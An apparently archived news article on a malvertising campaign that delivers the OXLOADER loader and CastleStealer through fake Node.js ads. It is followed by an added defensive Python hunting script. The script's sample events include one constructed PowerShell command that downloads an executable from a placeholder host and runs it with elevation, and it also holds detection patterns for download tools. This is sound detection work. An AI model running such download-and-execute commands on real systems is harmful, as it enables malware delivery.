
New OXLOADER Loader Uses Malicious Google Ads to Deliver CastleStealer

The Hacker News, archived Jun 22, 2026

Ravie Lakshmanan | Jun 22, 2026 | Malvertising / Endpoint Security

Cybersecurity researchers have disclosed details of a new campaign that delivers CastleStealer by means of a previously unreported malware loader dubbed OXLOADER. According to Elastic Security Labs, the campaign leverages malicious Google Ads as a starting point to distribute the malware. Evidence indicates that the threat actor is likely Russian-speaking and financially motivated, owing to the presence of explicit exclusions to prevent infecting machines located in the Commonwealth of Independent States (CIS) region. The campaign has been codenamed REF8372.

"The loader uses several obfuscation layers (control-flow flattening, opaque predicates, mixed Boolean-Arithmetic), self-modifying decryption stubs, and abuses the Windows .reloc section to stage shellcode," researchers Daniel Stepanic and Jia Yu Chan said in a technical breakdown.

The attack begins when unsuspecting users enter queries such as "lts version of node.js" on search engines like Google, redirecting them to a fake website ("node-js[.]prentiva99[.]info") surfaced via bogus ads published under the verified name "ВОЛОДИМИР ТЕРЕЩЕНКО" that's purportedly based in Ukraine. It's currently unknown if the advertiser account is linked to the actual threat actor, or if it's a front account or a purchased identity. The advertiser account, along with its ad campaigns, was removed from Google on May 14, 2026.

Users who end up interacting with the site are served a batch script hosted on Storj, a decentralized, open-source cloud storage platform. The abuse of Storj once again illustrates how threat actors continue to leverage legitimate services to evade domain-based reputation filters.
Running the batch script displays a bogus installation wizard user interface (UI) while stealthily downloading the next-stage payload, a Storj-hosted executable dubbed OXLOADER, through a PowerShell command and executing it with -Verb RunAs to trigger a Windows User Account Control (UAC) prompt. The attack then employs DLL side-loading to launch a rogue DLL, which proceeds to decrypt and execute the CastleStealer payload. OXLOADER also uses techniques such as control-flow flattening (CFF) and mixed Boolean-Arithmetic (MBA) to evade static detection, and takes steps to ensure it does not run in sandboxed environments.

CastleStealer is a .NET information stealer that was recently distributed alongside CastleLoader through a ClickFix-style lure masquerading as a free image-editing tool as part of a campaign codenamed BackgroundFix. CastleLoader is attributed to a threat activity cluster known as GrayBravo.

"OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic said. "The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis."

"That investment is paying off, resulting in low detection rates across static engines and detonation runs, giving OXLOADER a window to operate before it gets hunted down."

Tags: DLL side-loading, Elastic Security Labs, Google Ads, Information Stealer, malvertising, Malware, powershell
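The staging chain the article describes (a batch script spawning PowerShell that downloads a Storj-hosted executable and relaunches it with -Verb RunAs to raise a UAC prompt) is a useful hunting pattern on its own. The following Python sketch is an added, defender-side example that is not from the article, from Elastic Security Labs, or from The Hacker News: it scans constructed process-creation events (Sysmon Event ID 1 style, simplified to dataclasses) and flags a PowerShell process whose command line contains both a download primitive and a Start-Process -Verb RunAs elevation. The field names, the sample command lines and the Storj URL placeholder are assumptions for illustration, not indicators from the campaign.

```python
"""Hunt for the batch -> PowerShell -> download -> -Verb RunAs staging pattern.

Added example (not the article's or Elastic's code). Events are constructed
Sysmon-like process-creation records; field names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Simplified process-creation event (Sysmon Event ID 1 style, assumed fields)."""
    pid: int
    parent_image: str
    parent_command_line: str
    image: str
    command_line: str


# A download primitive inside the PowerShell command line.
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile\(|Start-BitsTransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# Start-Process ... -Verb RunAs: relaunch with a UAC prompt, as the article describes.
ELEVATE_RE = re.compile(r"Start-Process\b.*-Verb\s+RunAs\b", re.IGNORECASE | re.DOTALL)
# Payload written to or launched from a user-writable location.
USER_WRITABLE_RE = re.compile(
    r"(%TEMP%|\$env:TEMP|\\AppData\\Local\\Temp\\|\\Users\\Public\\|\\Downloads\\)",
    re.IGNORECASE,
)


def suspicious_reasons(ev: ProcEvent) -> list[str]:
    """Return the indicators present on a PowerShell process-creation event."""
    reasons: list[str] = []
    if not ev.image.lower().endswith("powershell.exe"):
        return reasons
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("download primitive in command line")
    if ELEVATE_RE.search(ev.command_line):
        reasons.append("Start-Process -Verb RunAs (UAC prompt for elevation)")
    if USER_WRITABLE_RE.search(ev.command_line):
        reasons.append("payload path in user-writable directory")
    if ev.parent_image.lower().endswith("cmd.exe") and ".bat" in ev.parent_command_line.lower():
        reasons.append("spawned by a batch script through cmd.exe")
    return reasons


def is_oxloader_like(ev: ProcEvent) -> bool:
    """Download plus elevation in one command line is required to fire.

    The other two indicators only add context, so a lone administrative
    'Start-Process -Verb RunAs' or a lone Invoke-WebRequest stays quiet.
    """
    reasons = suspicious_reasons(ev)
    has_download = any(r.startswith("download") for r in reasons)
    has_elevate = any("RunAs" in r for r in reasons)
    return has_download and has_elevate


def triage(events: list[ProcEvent]) -> list[int]:
    """PIDs of the events that match the staging pattern."""
    return [ev.pid for ev in events if is_oxloader_like(ev)]


# Constructed sample events. The Storj URL is a labelled placeholder, not a real indicator.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Benign interactive use from Explorer.
    ProcEvent(101, r"C:\Windows\explorer.exe", "explorer.exe", PS,
              r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\alice"),
    # Benign admin elevation with no download: must not fire.
    ProcEvent(102, r"C:\Windows\System32\cmd.exe", "cmd.exe", PS,
              "powershell.exe -Command Start-Process notepad.exe -Verb RunAs"),
    # The staging chain from the article: batch -> PowerShell download -> RunAs relaunch.
    ProcEvent(103, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\Downloads\node-lts-setup.bat"', PS,
              "powershell.exe -w hidden -c \"Invoke-WebRequest -Uri "
              "https://STORJ-PLACEHOLDER.example/oxloader.exe -OutFile $env:TEMP\\setup.exe; "
              "Start-Process $env:TEMP\\setup.exe -Verb RunAs\""),
    # Benign build script launched from a batch file: only one weak indicator.
    ProcEvent(104, r"C:\Windows\System32\cmd.exe", "cmd.exe /c build.bat", PS,
              r"powershell.exe -File .\scripts\build.ps1"),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.pid, is_oxloader_like(ev), suspicious_reasons(ev))
```

Only the third constructed event fires; the administrative RunAs and the batch-launched build script are left alone because they lack the download-plus-elevation pairing. In a real deployment the same logic maps onto a SIEM query over process-creation telemetry, and the user-writable-path and batch-parent indicators are what you would surface to the analyst as context.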